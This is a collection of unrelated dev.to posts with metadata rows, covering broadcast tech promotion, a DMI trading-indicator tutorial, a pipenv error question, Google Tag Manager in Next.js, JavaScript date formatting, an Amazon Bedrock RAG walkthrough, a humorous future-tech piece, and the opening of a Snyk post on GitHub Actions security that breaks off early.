Alright, tech fiends, strap in because we're about to embark on one wild ride! As someone who's always on the bleeding edge of media tech innovation, I was utterly spellbound by the sheer production wizardry that went down at the recent [NFL Draft 2024](https://www.sportsvideo.org/2024/04/25/nfl-draft-2024-nfl-network-embraces-motown-groove-with-massive-production-that-goes-beyond-detroit/). Whispers on the grapevine suggest that the NFL Network pulled out all the stops, unleashing a game-changing solution called TVU MediaHub to make this epic extravaganza a reality (peep it [here](https://www.linkedin.com/posts/tvu-networks_nfl-draft-2024-nfl-network-embraces-motown-activity-7189650786803445760-3dRd/?utm_source=share&utm_medium=member_desktop) if you're curious).
Needless to say, my curiosity was piqued to the max, and I just had to dive deep into this platform that seems destined to shake up the broadcasting game like never before.
## Propelling Live Production to Unprecedented Heights
At its core, TVU MediaHub is a cloud-based beast designed to tackle the ever-growing complexities of modern broadcasting head-on. Here are a few standout features that caught my eye:
- Scalability on Steroids: This bad boy can handle an insane array of video inputs and outputs across various formats, from SDI and NDI to RTMP and SRT. We're talking flexibility on a whole new level, folks!
- Real-Time Sorcery: Harnessing the power of cutting-edge AI and algorithmic witchcraft, TVU MediaHub delivers lightning-fast video and audio processing with minimal latency – a live broadcaster's dream come true, no doubt.
- Dynamic Resource Kung-Fu: Built on a microservice architecture with a mind-boggling 140 microservices (yes, you read that right), this platform optimizes resource allocation on the fly, ensuring top-notch performance and cost-efficiency.
Collectively, these features are smashing through the boundaries of what's possible in media distribution and broadcasting, promising a seamless, high-quality experience for viewers like never before.

## The NFL Draft 2024: A Case Study in Excellence
The NFL Network's use of [TVU](https://www.tvunetworks.com/) MediaHub during the recently concluded NFL Draft 2024 serves as a prime example of this platform's capabilities in action. In a production of this magnitude, efficiency and reliability are non-negotiable, plain and simple.
- Signal Symphony: TVU MediaHub deftly managed high-definition audio and video signals from multiple sources, ensuring synchronized, high-quality broadcasts across various platforms, including social media and OTT services.
- Real-Time Mastery: With its real-time content management prowess, the platform minimized latency, ensuring that live interviews and feeds were broadcast without a hitch. This level of performance is crucial for maintaining that immersive viewer experience during live events.
The resounding success of the NFL Draft 2024 underscores TVU MediaHub's ability to handle complex live productions with ease, making it an invaluable asset for broadcasters.
## Outshining the Competition, One Groundbreaking Innovation at a Time
But what truly sets TVU MediaHub apart from its rivals? Here are a few key factors that give it an edge:
- AI-Powered Precision: The platform's use of AI for real-time video processing, including encoding and frame rate conversion, ensures top-notch performance with minimal human intervention.
- Redundancy and Reliability Reign Supreme: Its unique distribution mechanism, combined with path redundancy, ensures uninterrupted service, even in the face of network challenges. This reliability factor is a significant advantage over competitors who may not offer the same level of redundancy and real-time processing capabilities.
- Real-Time Collaboration on Point: TVU MediaHub supports real-time collaboration, with features like integrated multi-viewers and metering. This sets it apart in its ability to facilitate collaborative live production environments.
These technical advantages highlight TVU MediaHub's superiority in the market, offering broadcasters a versatile and reliable tool for live production and media distribution.
## Industry Recognition and Future Potential
### Industry Accolades
TVU MediaHub's innovative contributions haven't gone unnoticed. At NAB 2024, it was awarded the coveted Product of the Year Award for its advanced routing capabilities and impact on content distribution. Similarly, at CABSAT 2024, the platform was celebrated for its role in driving broadcast innovation.
- NAB 2024 Award: This recognition at NAB 2024 underscores the platform's significant impact on the industry, showcasing its advanced features that are pushing the boundaries of what's possible in media production ([NAB Show Announces Winners of 2024 Product of the Year Awards](https://www.nab.org/documents/newsRoom/pressRelease.asp?id=6975)).
- CABSAT 2024 Accolades: At CABSAT 2024, TVU MediaHub was lauded for its transformative role in live production workflows, further cementing its status as a leader in the field ([LinkedIn Post on CABSAT 2024](https://www.linkedin.com/posts/tvu-networks_tvunetworks-cabsat2024-broadcastinnovation-activity-7199118338776588288-QAmL)).
### User Feedback
But it's not just industry experts singing TVU MediaHub's praises. Feedback from users has been overwhelmingly positive, with broadcasters lauding the platform for its user-friendly interface, exceptional performance, and cost-effectiveness. The platform's success during the NFL Draft 2024 has particularly highlighted its reliability and efficiency in large-scale live events.
### Future Prospects
Looking ahead, TVU MediaHub is poised to drive further innovations in media production and distribution:
- AI Capabilities on Steroids: Future developments are likely to see even more sophisticated AI features for automated video processing and enhanced operational efficiency.
- Integration with Emerging Tech: The platform's potential integration with 5G and edge computing promises even greater real-time capabilities, making it indispensable for next-generation media production.
- Applications Galore: From live sports to news broadcasting and entertainment, TVU MediaHub's application scenarios are vast. Its ability to deliver low-latency, high-quality content will revolutionize production workflows across various domains.
In the ever-evolving media landscape, TVU MediaHub represents a significant leap forward in technology. Its application in the NFL Draft 2024 and subsequent industry recognition underscore its transformative potential. As the world of broadcasting continues to evolve, TVU MediaHub is set to lead the charge, setting new standards for live production and content distribution. | kevintse756 | |
1,879,806 | Calculation and application of DMI indicators | Introduction to DMI indicators The DMI indicator is also called the momentum indicator or... | 0 | 2024-06-07T02:22:11 | https://dev.to/fmzquant/calculation-and-application-of-dmi-indicators-2k0k | indicators, trading, cryptocurrency, fmzquant | ## Introduction to DMI indicators
The DMI indicator is also called the momentum indicator or the trend indicator; its full name is "Directional Movement Index (DMI)". It was created by the American technical analysis guru J. Welles Wilder and is a medium- to long-term market technical analysis method.
The DMI indicator captures the shifting equilibrium between buyers and sellers as prices rise and fall. In other words, the relative strength of the long and short sides changes with price fluctuations, cycling from equilibrium to imbalance and back, thus providing a technical basis for judging the trend.
## Indicator calculation
Recently, a number of friends in the quantitative trading business have asked me how to use the DMI indicator on the FMZ Quant trading platform. I thought it was a very simple problem and opened the API documentation looking for this indicator function, only to find that it is not available in the "versatile" talib indicator library. After some googling, I found some information.
It turns out that this indicator is composed of four component lines. The algorithm is not complicated; simply following it is enough.
Algorithm address: https://www.fmz.com/strategy/154050
- Source code
```
// Indicator function
function AdX(MDI, PDI, adx_period) {
    if (typeof(MDI) == "undefined" || typeof(PDI) == "undefined") {
        return false
    }
    if (MDI.length < 10 || PDI.length < 10) {
        return false
    }
    /*
    DX = abs(DIPlus - DIMinus) / (DIPlus + DIMinus) * 100
    ADX = sma(DX, len)
    */
    var dx = []
    for (var i = 0; i < MDI.length; i++) {
        if (!MDI[i] || !PDI[i]) {
            continue
        }
        var dxValue = Math.abs(PDI[i] - MDI[i]) / (PDI[i] + MDI[i]) * 100
        var obj = {
            Close: dxValue,
        }
        dx.push(obj)
    }
    if (dx.length < adx_period) {
        return false
    }
    var adx = talib.SMA(dx, adx_period)
    return adx
}

function DMI(records, pdi_period, mdi_period, adxr_period, adx_period) {
    var recordsHLC = []
    for (var i = 0; i < records.length; i++) {
        var bar = {
            High: records[i].High,
            Low: records[i].Low,
            Close: records[i].Close,
        }
        recordsHLC.push(bar)
    }
    var m_di = talib.MINUS_DI(recordsHLC, mdi_period)
    var p_di = talib.PLUS_DI(recordsHLC, pdi_period)
    var adx = AdX(m_di, p_di, adx_period)
    // ADXR = (current ADX + ADX from adxr_period bars ago) / 2
    var n = 0
    var adxr = []
    for (var j = 0; j < adx.length; j++) {
        if (typeof(adx[j]) == "number") {
            n++
        }
        if (n >= adxr_period) {
            var curradxr = (adx[j] + adx[j - adxr_period]) / 2
            adxr.push(curradxr)
        } else {
            adxr.push(NaN)
        }
    }
    return [m_di, p_di, adx, adxr]
}
```
- Comparing
Using the data library of FMZ Quant, it is easy to draw a chart and compare DMI with other charts.


Comparing the indicator values on several K-line bars, the values are basically the same (with only slight rounding deviations).
- Usage
Call the DMI function directly (as it is called in the example's main function), pass in the K-line data, and set the indicator parameters, which are generally 14.
The data returned by the function is a two-dimensional array representing four lines.
- DI-: m_di
- DI+: p_di
- ADX: adx
- ADXR: adxr
Among these four DMI lines, DI- and DI+ are the long and short indicators, reflecting the strength of the long and short sides.
ADX and ADXR are a pair of indicator lines used together; they are trend indicators, reflecting the current trend and direction of the market.
For DI+, the higher the value, the stronger the current bullish momentum; the lower the value, the weaker it is.
DI- is the opposite.
DI+ and DI- are often intertwined; the closer their values are, the more the market is in a deadlock. The further apart they are, the stronger the trend.
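To make the relationship concrete, the DX value that ADX smooths is simply the DI spread expressed as a percentage of the DI sum. A small standalone JavaScript sketch (independent of the FMZ platform):

```javascript
// DX measures how far apart DI+ and DI- are, as a percentage of their sum.
function dxValue(pdi, mdi) {
    return Math.abs(pdi - mdi) / (pdi + mdi) * 100
}

// Deadlocked market: DI+ and DI- nearly equal, so DX is small.
console.log(dxValue(21, 19))  // 5
// Strong trend: DI+ far above DI-, so DX is large.
console.log(dxValue(40, 10))  // 60
```

A near-zero DX signals a deadlocked market, while a large DX signals a strong directional move, whichever side it favors.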
## Signal
- Price bottom signal
After a long-term price decline, if the following conditions are met in the short term, it indicates that the short-term price bottom has been reached, and there may be a rebound or reversal.
**The DI+ line, representing buying strength, is below 10 and turns upward from the oversold position, while the DI- line is at a high position.**
**The ADX line, representing the trend, is at a high position above 65, turning down and crossing below the ADXR line.**
- Price top signal
After a long-term rise, if the following conditions are met in the short term, it indicates that a short-term top has been reached, and there may be short-term adjustments or reversals.
**The DI- line, representing selling strength, is below 10 and turns upward from the low position, while the DI+ line is at a high position.**
**The ADX line, representing the trend, is at a high position above 65, turning down and crossing below the ADXR line.**
- Start of an uptrend
After a period of price fluctuation, the DMI's four indicator lines are intertwined at a low price level; then a long bullish K-line suddenly appears on heavy volume, pushing the price up more than 5%. Within two days the DI+ line successively crosses above the DI- line, the ADX line, and the ADXR line, indicating that a new uptrend is forming. You can open a position when the DI+ line crosses above the last of these lines.
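The "DI+ crosses above" condition in the rule above can be checked programmatically; here is a minimal standalone sketch (the array names and the `crossUp` helper are illustrative, not part of the FMZ API):

```javascript
// Returns true if series a crossed above series b at index i:
// a was at or below b on the previous bar and is above b now.
function crossUp(a, b, i) {
    return i > 0 && a[i - 1] <= b[i - 1] && a[i] > b[i]
}

var pdi = [18, 19, 23, 27]
var mdi = [22, 21, 20, 19]
console.log(crossUp(pdi, mdi, 2))  // true: DI+ crossed above DI- on bar 2
```

The same helper can be reused against the ADX and ADXR series to confirm that DI+ has cleared all three lines before opening a position.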
From: https://blog.mathquant.com/2019/08/03/calculation-and-application-of-dmi-indicators.html | fmzquant |
1,879,782 | Rumo do dev.to e aprendizado. | Hey people, acho que pouca gente, ou ninguém, acompanha esse dev.to mas ele vai virar um repositório... | 0 | 2024-06-07T02:17:27 | https://dev.to/matheuscsnt/rumo-do-devto-e-aprendizado-50m1 | productivity | Hey _people_, acho que pouca gente, _ou ninguém_, acompanha esse dev.to mas ele vai virar um **repositório de aprendizado**. Recentemente vi um post no X onde as pessoas falavam sobre o que sentiam falta da faculdade presencial, e além da socialização que pra mim é essencial e vital, percebi que senti falta de algo que me ajudava bastante a fixar conteúdos, que são os **trabalhos para casa, apresentações e seminários**.
With that in mind, I have decided to take key topics from my college courses, assign myself homework on them, and post it here, in order to consolidate the knowledge and also organize concepts and notes. So that is what you will see here soon: a lot of content, from my perspective.
| matheuscsnt |
893,543 | Help needed with pipenv problem | I am new to using pipenv virtual environments. I am using one with a Django project. Recently I... | 0 | 2021-11-10T00:39:09 | https://dev.to/macumhail/help-needed-with-pipenv-problem-e11 | beginners, pipenv | I am new to using pipenv virtual environments. I am using one with a Django project. Recently I accidentally executed a sudo command while inside pipenv shell. When I later tried to start the environment with "pipenv shell." I got a message that said, "The folder you are executing pip from can no longer be found."
I exited the directory and re-entered, then ran pipenv shell again. This time the env was activated. However, when I try to install a package or run pipenv lock --clear I get the following error:
```
Locking [dev-packages] dependencies...
Locking [packages] dependencies...
Building requirements...
Resolving dependencies...
✘ Locking Failed!
Traceback (most recent call last):
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 764, in <module>
    main()
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 758, in main
    _main(parsed.pre, parsed.clear, parsed.verbose, parsed.system, parsed.write,
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 741, in _main
    resolve_packages(pre, clear, verbose, system, write, requirements_dir, packages, dev)
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/resolver.py", line 695, in resolve_packages
    from pipenv.core import project
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/core.py", line 33, in <module>
    from .project import Project
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/project.py", line 30, in <module>
    from .vendor.requirementslib.models.utils import get_default_pyproject_backend
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/__init__.py", line 9, in <module>
    from .models.lockfile import Lockfile
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/models/lockfile.py", line 14, in <module>
    from ..utils import is_editable, is_vcs, merge_items
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/requirementslib/utils.py", line 8, in <module>
    import pip_shims.shims
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/__init__.py", line 26, in <module>
    from . import shims
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/shims.py", line 12, in <module>
    from .models import (
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 790, in <module>
    Command.add_mixin(SessionCommandMixin)
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 704, in add_mixin
    mixin = mixin.shim()
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 752, in shim
    result = self.traverse(top_path)
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 744, in traverse
    result = shim.shim()
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 590, in shim
    imported = self._import()
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 615, in _import
    result = self._import_module(self.calculated_module_path)
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/vendor/pip_shims/models.py", line 365, in _import_module
    imported = importlib.import_module(module)
  File "/Users/mainuser/.pyenv/versions/3.9.2/lib/python3.9/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/cli/req_command.py", line 15, in <module>
    from pipenv.patched.notpip._internal.index.package_finder import PackageFinder
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/index/package_finder.py", line 21, in <module>
    from pipenv.patched.notpip._internal.index.collector import parse_links
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_internal/index/collector.py", line 12, in <module>
    from pipenv.patched.notpip._vendor import html5lib, requests
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_vendor/requests/__init__.py", line 97, in <module>
    from pipenv.patched.notpip._vendor.urllib3.contrib import pyopenssl
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/pipenv/patched/notpip/_vendor/urllib3/contrib/pyopenssl.py", line 46, in <module>
    import OpenSSL.SSL
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/OpenSSL/__init__.py", line 8, in <module>
    from OpenSSL import rand, crypto, SSL
  File "/Users/mainuser/anaconda/lib/python3.6/site-packages/OpenSSL/rand.py", line 213, in <module>
    _lib.ERR_load_RAND_strings()
AttributeError: module 'lib' has no attribute 'ERR_load_RAND_strings'
```
The environment is supposed to use Python 3.9, but from the information above it appears to be using 3.6. Any ideas about how to fix this?
| macumhail |
1,879,781 | React.js 2024 Patterns | Hey) Here is a repo that explains most of the React.js... | 0 | 2024-06-07T02:15:24 | https://dev.to/leon740/reactjs-2024-patterns-4an5 | Hey)
Here is a repo that explains most of the React.js patterns.
https://github.com/Leon740/DreamReactStudy/tree/main/src/1_React
It's built around examples, presented in chronological order.

| leon740 | |
1,879,780 | Elevate Your Next.js E-commerce App with Google Tag Manager | Google Tag Manager simplifies the process of adding and updating tags (snippets of code) on your... | 0 | 2024-06-07T02:12:18 | https://dev.to/abdur_rakibrony_97cea0e9/elevate-your-nextjs-e-commerce-app-with-google-tag-manager-1ke0 | react, nextjs, gtm | Google Tag Manager simplifies the process of adding and updating tags (snippets of code) on your website without modifying the source code. It's a game-changer for marketers and analysts who need agility in tracking various events.
## Integrating GTM with Next.js:
Next.js, a React framework, has gained popularity for its simplicity and performance optimizations. Let's see how we can seamlessly integrate GTM:
```
import { GoogleTagManager } from '@next/third-parties/google'
import { Suspense } from "react";
// In your layout component
<Suspense fallback={null}>
<GoogleTagManager gtmId="GTM-******" />
</Suspense>
```
Here, we're using @next/third-parties/google, an official package that simplifies third-party script integration in Next.js. The GoogleTagManager component takes your GTM container ID (gtmId). We wrap it in a Suspense component with a null fallback to avoid any layout shifts during loading.
## Tracking Product Views:
```
"use client";
import { useEffect } from "react";
// In your product detail component
useEffect(() => {
if (product) {
window.dataLayer = window.dataLayer || [];
window.dataLayer.push({ ecommerce: null });
window.dataLayer.push({
event: "view_item",
ecommerce: {
currency: "BDT",
value: product?.price,
items: [
{
item_id: product?._id,
item_name: product?.title,
item_category: product?.category,
item_variant: product?.category || "",
price: product?.price,
quantity: product?.quantity,
},
],
},
});
}
}, [product]);
```
## Breaking down the code:
**"use client":** This is a Next.js directive indicating that the following code should run on the client-side.
**useEffect:** A React hook that runs after the component renders. Here, it runs when the product changes.
**window.dataLayer:** This is how GTM receives data. We initialize it if it doesn't exist.
**dataLayer.push({ ecommerce: null }):** This clears any previous ecommerce data to avoid conflicts.
**dataLayer.push({ ... }):** We push the view_item event data.
**event:** "view_item" is a standard GA4 ecommerce event.
**ecommerce.currency:** The currency code (BDT for Bangladeshi Taka).
**ecommerce.value:** The price of the product (here, `product?.price`).
**ecommerce.items:** An array of items viewed. In this case, just one product. item_id, item_name, item_category, item_variant, price, and quantity are standard GA4 product properties. | abdur_rakibrony_97cea0e9 |
1,879,779 | Display the current time | Goal: 01 / 01 / 2000, 12:00 const now = new Date(); const day = `${now.getDate()}`.padStart(2,... | 0 | 2024-06-07T02:08:40 | https://dev.to/kakimaru/display-the-current-time-4607 | Goal: 01 / 01 / 2000, 12:00
```
const now = new Date();
const day = `${now.getDate()}`.padStart(2, '0');
const month = `${now.getMonth() + 1}`.padStart(2, '0');
const year = now.getFullYear();
const hour = `${now.getHours()}`.padStart(2, '0');
const min = `${now.getMinutes()}`.padStart(2, '0');
```
- padStart() is a string method, so the value must first be converted to a string.
- padStart(targetLength, padString) pads the start of the string with padString until the result reaches targetLength.
```
hoge.textContent = `${day}/${month}/${year}, ${hour}:${min}`;
```
-----
If I want to show 'TODAY' or 'Yesterday' when the day is matched.
```
const calcDayPassed = (date1, date2) => Math.round(Math.abs(date2 - date1) / (1000 * 60 * 60 * 24)); // convert the timestamp difference (ms) to whole days
const formatMovementDate = (date) => {
  const daysPassed = calcDayPassed(new Date(), date);
  if (daysPassed === 0) return 'Today';
  if (daysPassed === 1) return 'Yesterday';
  if (daysPassed <= 7) return `${daysPassed} days ago`;
  const day = `${date.getDate()}`.padStart(2, '0');
  const month = `${date.getMonth() + 1}`.padStart(2, '0');
  const year = date.getFullYear();
  return `${day}/${month}/${year}`;
};
```
Internationalisation
```
const now = new Date();
const options = {
hour: 'numeric',
minute: 'numeric',
day: 'numeric',
month: 'numeric',
year: 'numeric',
}
const locale = navigator.language;
hoge.textContent = new Intl.DateTimeFormat(locale, options).format(now);
```
[MDN: Intl.DateTimeFormat](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Intl/DateTimeFormat)
| kakimaru | |
1,879,774 | Generative AI Serverless - RAG using Bedrock Knowledge base, Zero Setup, Single document, Lambda and API! | Generative AI - Has Generative AI captured your imagination to the extent it has for me? Generative... | 0 | 2024-06-07T02:07:47 | https://dev.to/bhatiagirish/generative-ai-serverless-rag-using-bedrock-knowledge-base-zero-setup-single-document-lambda-and-api-3djn | aws, anthropic, bedrock, generativeai | Generative AI - Has Generative AI captured your imagination to the extent it has for me?
Generative AI is indeed fascinating! The advancements in foundation models have opened up incredible possibilities. Who would have imagined that technology would evolve to the point where you can generate content summaries from transcripts, have chatbots that can answer questions on any subject without requiring any coding on your part, or even create custom images based solely on your imagination by simply providing a prompt to a Generative AI service and foundation model? It's truly remarkable to witness the power and potential of Generative AI unfold.
**'Chat with your document' is the latest Generative AI feature added by Amazon to its already feature-rich areas of GenAI, Knowledge Base, and RAG.**
RAG, which stands for Retrieval Augmented Generation, is becoming increasingly popular in the world of Generative AI. It allows organizations to overcome the limitations of LLMs and utilize contextual data for their Generative AI solutions.
Amazon Bedrock is a fully managed service that offers a choice of many foundation models, such as Anthropic Claude, AI21 Jurassic-2, Stability AI, Amazon Titan, and others.
I will use the recently released Anthropic Sonnet foundation model and invoke it via the Amazon Bedrock Knowledge Base in the AWS Console, and subsequently from a Lambda function via an API.
As of May 2024, this is the only model supported by AWS for the single document knowledge base or 'Chat with your document' function.
There are many use cases where the generative AI "chat with your document" function can help increase productivity. A few examples: technical support extracting information from a user manual to quickly resolve customer questions, HR answering questions based on policy documents, a developer using technical documentation to get information about a specific function, or a call center team quickly addressing customer inquiries by chatting with product documentation.
**Let's look at our use cases:**
• MyBankGB, a fictitious bank, offers various credit cards to consumers. The document "MyBankGB Credit Card Offerings.pdf" contains detailed information about all the features and details of the credit cards offered by the bank.
• MyBankGB is interested in implementing a Generative AI solution using the "Chat with your document" function of Amazon Bedrock Knowledge Base. This solution will enable the call center team to quickly access information about the card features and efficiently address customer inquiries.
• The solution needs to be API-based so that it can be invoked via different applications.
Here is the architecture diagram for our use case.

Let's see the steps to create a single document knowledge base in Bedrock and start consuming it using AWS Console and then subsequently creating a lambda function to invoke it via API.
**Review AWS Bedrock 'Chat with your document'**
Chat with your document is a new feature. You can use it via the AWS Console, or use the SDK to invoke it from a Lambda function exposed through an API.

For Data, you can upload a file from your computer OR you can provide ARN for the file posted in the S3 bucket.

Select the model. Anthropic Claude 3 Sonnet is the only supported model as of May 2024.
**Request Model Access**
Before you can use the model, you must request access to the model.
**Chat with your document using AWS Console**

**Review the response**

**Let's review more prompts and responses!**


As you can see above, all answers are provided in the context of the document uploaded in the S3 bucket. This is where RAG makes the generative AI responses more accurate and reliable, and controls the hallucination.
However, our business use case asks for creating an API based solution hence we will extend this solution by implementing a Lambda function and API that can be invoked by the user or application.
**Create a SAM template**
I will create a SAM template for the Lambda function that contains the code to invoke the Bedrock API, along with the required parameters and a prompt for RAG. The Lambda function could be created without a SAM template; however, I prefer the infrastructure-as-code approach, since it allows cloud resources to be recreated easily. Here is the SAM template for the Lambda function.

**Create a Lambda Function**
The Lambda function serves as the core of this automated solution. It contains the code necessary to fulfill the business requirement of creating an API for RAG based generative AI solution. This Lambda function accepts a prompt, which is then forwarded to the Bedrock API to generate a response using the single document knowledge base and Anthropic Sonnet foundation model. Now, Let’s look at the code behind it.

**Build function locally using AWS SAM**
Next, build and validate the function locally using AWS SAM before deploying the Lambda function to the AWS cloud. A few of the SAM commands used are:
• `sam build`
• `sam local invoke`
• `sam deploy`
**Validate the GenAI Model response using a prompt**
Prompt engineering is an essential component of any Generative AI solution. It is both art and science, as crafting an effective prompt is crucial for obtaining the desired response from the foundation model. Often, it requires multiple attempts and adjustments to the prompt to achieve the desired outcome from the Generative AI model.
Given that I'm deploying the solution to AWS API Gateway, I'll have an API endpoint post-deployment. I plan to utilize Postman for passing the prompt in the request and reviewing the response. Additionally, I can opt to post the response to an AWS S3 bucket for later review.


Based on the prompt, requested info is returned, Source/citation is also provided in the response.
With these steps, a serverless GenAI solution has been successfully completed to implement a single-document knowledge base using Amazon Bedrock, Lambda, and API. Python/Boto3 were utilized to invoke the Bedrock API with Anthropic Sonnet.
As GenAI solutions keep improving, they will change how we work and bring real benefits to many industries. This workshop shows how powerful AI can be in solving real-world problems and creating new opportunities for innovation.
Thanks for reading!
Here is the YouTube video for this solution:
{% embed https://www.youtube.com/watch?v=B_G_JTdcqiY %}
𝒢𝒾𝓇𝒾𝓈𝒽 ℬ𝒽𝒶𝓉𝒾𝒶
𝘈𝘞𝘚 𝘊𝘦𝘳𝘵𝘪𝘧𝘪𝘦𝘥 𝘚𝘰𝘭𝘶𝘵𝘪𝘰𝘯 𝘈𝘳𝘤𝘩𝘪𝘵𝘦𝘤𝘵 & 𝘋𝘦𝘷𝘦𝘭𝘰𝘱𝘦𝘳 𝘈𝘴𝘴𝘰𝘤𝘪𝘢𝘵𝘦
𝘊𝘭𝘰𝘶𝘥 𝘛𝘦𝘤𝘩𝘯𝘰𝘭𝘰𝘨𝘺 𝘌𝘯𝘵𝘩𝘶𝘴𝘪𝘢𝘴𝘵
| bhatiagirish |
1,879,778 | 2024 vs. 2050: A Hilarious Look at Our Technological Future | Welcome, fellow tech enthusiasts, to a blog post that’s part crystal ball and part comedy club!... | 0 | 2024-06-07T02:05:34 | https://dev.to/nandha_krishnan_nk/2024-vs-2050-a-hilarious-look-at-our-technological-future-3dbk | ai, computerscience, career | Welcome, fellow tech enthusiasts, to a blog post that’s part crystal ball and part comedy club! Today, we’re taking a lighthearted yet informative journey to compare the year 2024 with the far-off and fantastical 2050. Buckle up, because we’re about to zoom through time with a mix of wit, wonder, and a dash of whimsy.

**The Year 2024: Where Are We Now?**
Ah, 2024. A year where the future feels tantalizingly close, yet we’re still waiting for some of those sci-fi dreams to become reality. Let’s start by taking a look at the technological landscape of today.
**Highlights of 2024:**
**5G Networks:** We're enjoying super-fast internet speeds, but still complaining when a cat video buffers for half a second.
**AI Assistants:** Siri and Alexa are practically family members, yet they still struggle to understand our thick morning accents.
**Electric Vehicles:** Teslas are everywhere, silently judging us for driving anything with an internal combustion engine.
**Smart Homes:** Our fridges can tell us when we're out of milk, but they still can’t stop us from eating that leftover pizza at 2 AM.
**Social Media:** We're all connected, oversharing our lives, and deep-diving into conspiracy theories at 3 AM.
Life in 2024 is pretty great, but what does the future hold? Let's leap forward to 2050 and see how things might change—and laugh a bit along the way.

**The Year 2050: A Peek into the Future**
Welcome to 2050, a world where today’s sci-fi is tomorrow’s reality. Here’s a glimpse of the incredible (and sometimes ridiculous) advancements we might see.
**Highlights of 2050:**
**Holographic Meetings:** Forget Zoom fatigue. In 2050, we’re dealing with hologram headaches because your boss's hologram insists on pacing around your living room during meetings.
**AI Companions:** AI assistants are now fully sentient and capable of emotional support. Be prepared for your toaster to give you life advice and your vacuum to ask for a raise.
**Flying Cars:** They’re finally here! And they come with their own set of problems, like aerial traffic jams and bird-strike insurance.
**Space Tourism:** Everyone’s going to Mars for vacation, but there’s still no Wi-Fi in space. Guess you’ll have to upload your zero-gravity selfies when you get back.
**Smart Everything:** Your entire wardrobe is smart. Clothes that change color, adjust temperature, and even give you a pep talk before a big date. Just don’t ask them for fashion advice—they can be brutally honest.
**Comparing 2024 and 2050**
Now, let’s take a side-by-side look at how far we’ve come (and laugh a bit at the absurdity of it all).
**Communication:**
**2024:** “Hey Siri, call Mom.”
**2050:** “Hey Holo-Siri, project Mom’s hologram here so I can show her my new Martian pet.”
**Transportation:**
**2024:** Electric cars are cool, but we’re still stuck in traffic.
**2050:** Flying cars are cooler, but we’re now stuck in aerial traffic, dodging drones and the occasional lost weather balloon.
**Entertainment:**
**2024:** Binge-watching on Netflix.
**2050:** Immersing ourselves in full-sensory VR shows where you not only watch but also smell, taste, and feel the action. Just hope the horror movies come with a “smell off” option.

**Daily Life:**
**2024:** Smart homes that sometimes misunderstand our commands. “Alexa, turn off the lights!”—“Playing ‘Turning Off the Lights’ by John Doe.”
**2050:** Ultra-smart homes that anticipate our needs. “I’ve ordered dinner, set the mood lighting, and started your favorite playlist. Also, your ex is approaching the door, should I deploy the escape hatch?”
**Conclusion**
While 2024 is a marvel of modern technology, 2050 promises a future where today’s dreams and frustrations become tomorrow’s realities and comedy sketches. From AI companions with attitude to flying cars causing aerial pile-ups, the future is bound to be as entertaining as it is advanced.
Stay tuned to our blog for more futuristic fun and tech insights. Don’t forget to subscribe and follow us—whether you’re still on your 2024 smartphone or your 2050 mind-implanted AI assistant does it for you! | nandha_krishnan_nk |
1,879,776 | Call for action: Exploring vulnerabilities in Github Actions | In this blog post, we will provide an overview of GitHub Actions, examine various vulnerable scenarios with real-world examples, offer clear guidance on securely using error-prone features, and introduce an open source tool designed to scan configuration files and flag potential issues. | 0 | 2024-06-07T02:00:44 | https://snyk.io/blog/exploring-vulnerabilities-github-actions/ | devsecops, javascript, docker, node | To address the need for streamlined code changes and rapid feature delivery, CI/CD solutions have become essential. Among these solutions, GitHub Actions, launched in 2018, has quickly garnered significant attention from the security community. Notable findings have been published by companies like Cycode and Praetorian and security researchers such as Teddy Katz and Adnan Khan. Our recent investigation reveals that vulnerable workflows continue to emerge in prominent repositories from organizations like Microsoft (including Azure), HashiCorp, and more. In this blog post, we will provide an overview of GitHub Actions, examine various vulnerable scenarios with real-world examples, offer clear guidance on securely using error-prone features, and introduce an open source tool designed to scan configuration files and flag potential issues.
Github Actions overview
-----------------------
GitHub Actions is a powerful CI/CD solution that enables the automation of workflows in response to specific triggers. Each workflow consists of a set of jobs executed on either GitHub-hosted or self-hosted runner virtual machines. These jobs are composed of steps, where each step can execute a script or an Action — a reusable unit hosted on the GitHub Actions Marketplace or any GitHub repository.
Actions come in three forms:
1. **Docker**: Executes a Docker image hosted on Docker Hub inside a container.
2. **JavaScript**: Runs a Node.js application directly on the host machine.
3. **Composite**: Combines multiple steps into a single action.
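For illustration, a composite action is defined by an `action.yml` file like the following (a hypothetical sketch, not from the original article):

```yaml
# action.yml of a hypothetical composite action
name: 'Setup and Test'
description: 'Install dependencies and run tests'
inputs:
  node-version:
    description: 'Node.js version to use'
    default: '20'
runs:
  using: 'composite'
  steps:
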